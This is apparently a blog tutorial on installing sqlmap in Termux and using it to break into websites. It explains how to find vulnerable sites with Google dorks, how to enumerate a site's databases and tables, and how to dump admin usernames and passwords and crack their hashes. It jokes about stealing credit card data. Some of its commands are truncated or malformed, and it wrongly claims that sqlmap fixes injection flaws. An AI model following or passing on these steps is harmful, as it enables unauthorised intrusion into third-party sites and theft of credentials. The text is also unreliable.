How To Install And Use Sqlmap In Termux

How To Install And Use Sqlmap In Termux

I’ll demonstrate how to instal and use SQLMAP in Termux in this article. First off, SQLMAP is an open-source programme that automatically finds and fixes issues related to SQL injection. An attacker can control and alter a database on a server by performing a SQL injection attack.

Consequently, we may use that to steal or obtain a database from any website we choose. For instance, we can get the database’s admin user name and password for a website.

And if you’re lucky, you might be able to get a CC (Credit Card/Credit Card) for those who enjoy carding. Just kidding, though. Don’t use SQLMAP for any illicit activities.

Okay, let’s get going now.

Items required:

a mobile phone running Android 5.0 or above.

Download the termux app from the Play Store.

good online connectivity

Launch the Termux app if you downloaded it.

First, we’ll use the command to update the package list:

apt update

Now we have to install Python with the following command:

apt install python python2

Await Python’s installation. We will instal git after installing Python. You can clone the package with the aid of Git.

apt install git

We’ll use the git command to clone the SQLMAP package into our directory after installing git.

git clone

Await the procedure’ completion. Now that the procedure has been completed, we must access the tool directory using the following command.

cd sqlmap

Using the following command, we can now provide them access to read, write, and execute the SQLMAP Python file:

chmod +x

After that, you need to run the following command to run the SQLMAP


Now SQLMAP is successfully installed on your Termux.

The next time you wish to run SQLMAP, you must first start Termux and then access the SQLMAP directory by executing the command cd sqlmap. And after that, you must execute SQLMAP with the command python2

Let’s now look into SQLMAP’s website hacking capabilities.

Let me tell you first. Websites with a SQL injection vulnerability can be hacked.

Perhaps you’re wondering right now how to identify a website that has a SQL injection vulnerability.

To identify a website’s SQL injection vulnerability, utilise Google Dorks.

most websites have a PHP-based SQL injection vulnerability?

id=1 or any other value that appears after PHP?id=

You can use this Google dork inurl to find the vulnerable websites: PHP?id=1 or any value after PHP?id=

You can find more information about Google dorks here: Google hacking

Type the following command:

This command will help you to find out the database of the website

python2 -u <your website> –dbs

If the website is vulnerable then you will found the output similar to this:


Now our next step is to find tables that are present in the database with the following command

python2 -u <your website> –D Database –tables

The aforementioned statement instructs Sqlmap to identify the databases’ tables.

You’ll realise that information schema are useless, so don’t waste your time trying to discover credentials or other interesting information there.

The tables you see after running the aforementioned command will resemble those below.


Now our next step is to find columns under the table admin.

python2 -u <your website> -D Database -T admin –columns

The aforementioned statement instructs Sqlmap to identify the columns in the admin table.

Let’s now go to our last command.

As an illustration, you discovered the username and password in the column. The username and password must now be stored in text format on your Android device.

python2 -u <your website> -D Database -T admin -C username, password –dump

The aforementioned command will store the login and password on your device in text format.

The password might be encoded using md5, for example. The majority of passwords are written in text. If the password has been encrypted, you will need to decrypt it using findmyhash or another password-decryption tool.

You may simply hack any website that is vulnerable to SQL injection by using the instructions below. Thank you later.

Note: Substitute “your website” for the URL of the target website; make sure it ends with PHP?id=1 or any number after it. The SQLMAP will not function if a simple URL without PHP?id= is provided.

Enjoy 🥰.

Leave a Reply

Your email address will not be published. Required fields are marked *